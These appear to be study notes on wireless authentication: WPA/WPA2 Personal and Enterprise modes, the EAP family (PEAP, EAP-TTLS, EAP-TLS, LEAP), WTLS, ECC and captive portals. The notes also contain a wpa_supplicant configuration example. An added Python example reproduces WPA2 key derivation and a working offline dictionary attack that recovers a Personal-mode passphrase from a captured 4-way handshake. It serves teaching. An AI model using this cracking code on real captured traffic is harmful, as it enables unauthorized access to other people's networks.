Personal Versus Enterprise Modes
WPA and WPA2 Enterprise mode
Both WPA and WPA2 operate in either Personal or Enterprise mode.
Enterprise mode forces users to authenticate with unique credentials before granting them access.
Enterprise mode uses an 802.1x server, often implemented as a RADIUS server, which accesses a database of accounts.
The 802.1x server has a certificate on it to secure the authentication process.
WEP and WPA/WPA2 Personal users access the wireless network anonymously with a pre-shared key (PSK): every client shares the same key, so nothing ties a session to an individual user, and the key cannot be revoked for one person without changing it for everyone.
EAP, PEAP, and LEAP
The Extensible Authentication Protocol (EAP)
An authentication framework that provides general guidance for authentication methods.
802.1x servers typically use one of these methods (EAP, PEAP, LEAP) to increase the level of security during the authentication process.
Extensible Authentication Protocol (EAP)
provides a method for two systems to agree on a secure key, the Pairwise Master Key (PMK).
The systems then derive the session keys that encrypt all data transmitted between the devices from the PMK (in 802.11i the 4-way handshake derives the Pairwise Transient Key from it).
Both TKIP and AES-based CCMP use keys derived this way.
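The following is an added example, not code from the original notes, showing where the PMK comes from in Personal mode and why that matters for the Personal/Enterprise distinction above. In Personal mode the PMK is PBKDF2-HMAC-SHA1 of the passphrase and SSID, so one captured 4-way handshake (nonces, MAC addresses and the message-2 MIC) lets an eavesdropper test passphrase guesses offline; in Enterprise mode the EAP exchange produces a fresh PMK per session and there is no passphrase to guess. The MAC addresses, nonces and message-2 body are constructed sample values; the SSID and wordlist are assumed.

```python
"""
Added example, not code from the original notes: WPA2 key derivation and why
a captured 4-way handshake exposes a Personal-mode PSK to offline guessing.

Personal mode: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes),
so every client of the SSID shares one PMK. Enterprise mode: the EAP exchange
produces a fresh PMK for each authenticated session instead. In both cases the
4-way handshake then derives the Pairwise Transient Key (PTK) that TKIP/CCMP use.
MAC addresses, nonces and the message-2 body below are constructed sample values.
"""
import hashlib
import hmac


def pmk_from_psk(passphrase, ssid):
    """WPA/WPA2-Personal PMK from the pre-shared passphrase (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(ptk, frame):
    """WPA2 EAPOL-Key MIC: HMAC-SHA1 under the KCK (first 16 bytes of the PTK), truncated to 16 bytes."""
    return hmac.new(ptk[:16], frame, hashlib.sha1).digest()[:16]


# Constructed handshake parameters; an eavesdropper sees all of these on the air.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
MSG2 = b"constructed EAPOL-Key message 2 with MIC field zeroed " + SNONCE


def client_message2_mic(passphrase):
    """Supplicant side: PMK -> PTK, then MIC message 2 to prove knowledge of the PSK."""
    ptk = derive_ptk(pmk_from_psk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk, MSG2)


def crack_psk(captured_mic, wordlist):
    """Offline attack on Personal mode: recompute the MIC for each candidate passphrase
    and compare with the captured one. No further traffic to the AP is needed."""
    for candidate in wordlist:
        if hmac.compare_digest(client_message2_mic(candidate), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    mic = client_message2_mic("sunshine1")                      # what the real client sent
    print(crack_psk(mic, ["letmein", "qwerty", "sunshine1"]))    # recovers the PSK
```

The PBKDF2 step is the only cost the attacker pays per guess, which is why a short or dictionary passphrase in Personal mode falls quickly while the same handshake in Enterprise mode yields nothing to guess.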
Protected EAP (PEAP)
PEAP protects the EAP exchange itself: EAP was designed for links assumed to be physically secure, an assumption that does not hold on a wireless network.
It encapsulates and encrypts the EAP conversation in a Transport Layer Security (TLS) tunnel.
PEAP requires a certificate on the server, but not on the clients. A common implementation runs Microsoft Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2) inside the tunnel.
Clients must validate that server certificate; a client configured to skip the check will run MS-CHAPv2 with any access point that presents a certificate.
EAP-Tunneled TLS (EAP-TTLS)
Similar to PEAP (a separate method, not an extension of it): authentication runs inside a TLS tunnel,
allowing systems to use some older authentication methods such as Password Authentication Protocol (PAP) inside that tunnel.
It requires a certificate on the 802.1x server but not on the clients.
EAP-TLS
This is one of the most secure EAP standards and is widely implemented.
Requires certificates on the 802.1x server and on each of the wireless clients; both sides authenticate with certificates, so no password is sent at all.
Lightweight EAP (LEAP)
Cisco created LEAP using a modified version of the Challenge Handshake Authentication Protocol (CHAP).
It does not require a digital certificate.
Most wireless devices support LEAP, but its challenge/response is sent without a protective tunnel and can be attacked offline with a dictionary, so
Cisco recommends using stronger protocols instead of LEAP.
Note that PEAP, EAP-TTLS, and EAP-TLS all use digital certificates. Certificates help provide strong authentication and encryption services. However, a certificate authority (CA) must issue certificates, so an organization must either purchase certificates from a public CA or implement a private CA within the network, and every client must trust the CA that issued the server's certificate.
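As an added example (not configuration from the original notes), the following wpa_supplicant.conf network blocks show how the three certificate requirements above appear on a client: a PEAP/MS-CHAPv2 profile that trusts only the organization's private CA and checks the server name, and an EAP-TLS profile that additionally carries a client certificate. The SSID, identities, paths and passwords are assumed placeholders.

```ini
# Added example, not from the original notes. SSID, identities, file paths
# and passwords are placeholders.

# PEAP with MS-CHAPv2 inside the TLS tunnel: certificate on the server only.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    proto=RSN
    pairwise=CCMP
    eap=PEAP
    phase2="auth=MSCHAPV2"
    identity="alice@corp.example"
    password="correct horse battery staple"
    # Trust only the private CA that issued the RADIUS server's certificate and
    # pin the expected server name. Omitting these lets any AP with any
    # certificate terminate the tunnel and receive the MS-CHAPv2 exchange.
    ca_cert="/etc/ssl/certs/corp-private-ca.pem"
    domain_suffix_match="radius.corp.example"
}

# EAP-TLS: certificate on the server and on the client, no password at all.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    proto=RSN
    pairwise=CCMP
    eap=TLS
    identity="alice@corp.example"
    ca_cert="/etc/ssl/certs/corp-private-ca.pem"
    client_cert="/etc/wpa_supplicant/alice.crt"
    private_key="/etc/wpa_supplicant/alice.key"
    private_key_passwd="keypass"
    domain_suffix_match="radius.corp.example"
}
```

With a private CA, the ca_cert file is the organization's own root certificate distributed to every client; with a public CA it is that CA's root, and the domain_suffix_match line is what stops another customer of the same public CA from impersonating the RADIUS server.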
WTLS and ECC
Wireless Transport Layer Security (WTLS)
WTLS is a wireless implementation of TLS, designed for the Wireless Application Protocol (WAP) stack.
Elliptic curve cryptography (ECC)
ECC provides comparable security with much smaller keys than RSA, so it needs less processing power and bandwidth.
Many smaller wireless devices use WTLS or ECC.
Smaller wireless devices such as PDAs and cell phones don't have the same processing power as servers and desktops, and older ones can't handle protocols like WPA2.
Captive Portals
A captive portal forces clients using web browsers to complete a specific process before it allows them access to the network. Typical uses:
Free Internet access, where the user must accept terms of use before proceeding.
Paid Internet access, where the user must pay before being granted access.
Adding an 802.1x server can be expensive and is sometimes not a feasible option. Organizations can use captive portals as an alternative. A captive portal requires users to authenticate before granting them access, although it does not by itself provide the per-user encryption keys that Enterprise mode does.